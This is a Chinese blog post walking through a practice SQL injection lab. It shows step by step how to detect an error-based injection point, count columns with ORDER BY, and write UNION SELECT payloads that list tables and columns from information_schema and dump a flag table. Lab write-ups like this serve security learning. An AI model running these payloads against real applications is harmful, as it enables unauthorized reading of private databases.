sql 显错注入靶练习

2019/04/27 18:07 · sql注入 · 原创文章 · 1,487 · 0

sql 显错注入靶练习第1张

打开连接显示什么鬼    请输入id as 什么玩意 看不懂

找了有道哥哥翻译了一下  :请输入ID作为带数字值的参数

懂了  后面加上?id呗

sql 显错注入靶练习第2张

后面添加一个逗号发现sql语句错误    证明就是有sql注入

sql 显错注入靶练习第3张

查询一共多少个字段: order by 1,2,3,4

sql 显错注入靶练习第4张

一共是三个字段    接下来查询显出位置

sql 显错注入靶练习第5张

简单粗暴的  让他显示显出位置  id不可能为几点几

查询裤子  select 1,2,database()

查询表 union select 1,2,group_concat(table_name) from information_schema.table_constraints where constraint_schema='security' --+

sql 显错注入靶练习第6张

查询字段:union select 1,2,group_concat(column_name)from information_schema.columns where table_name='zkaq' --+

sql 显错注入靶练习第7张

开始查询flag了

union select 1,2,GROUP_CONCAT(ZKAQ) from ZKAQ--+

sql 显错注入靶练习第8张

flag是全部出来了  就需要自己一个一个去试去了     很难受哎(超大声逼逼)

您可能感兴趣的文章

本文地址:http://www.ouyangxiaoze.com/2019/04/57.html
文章标签: ,   ,   ,  
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!

文件下载

下一篇:

 发表评论


表情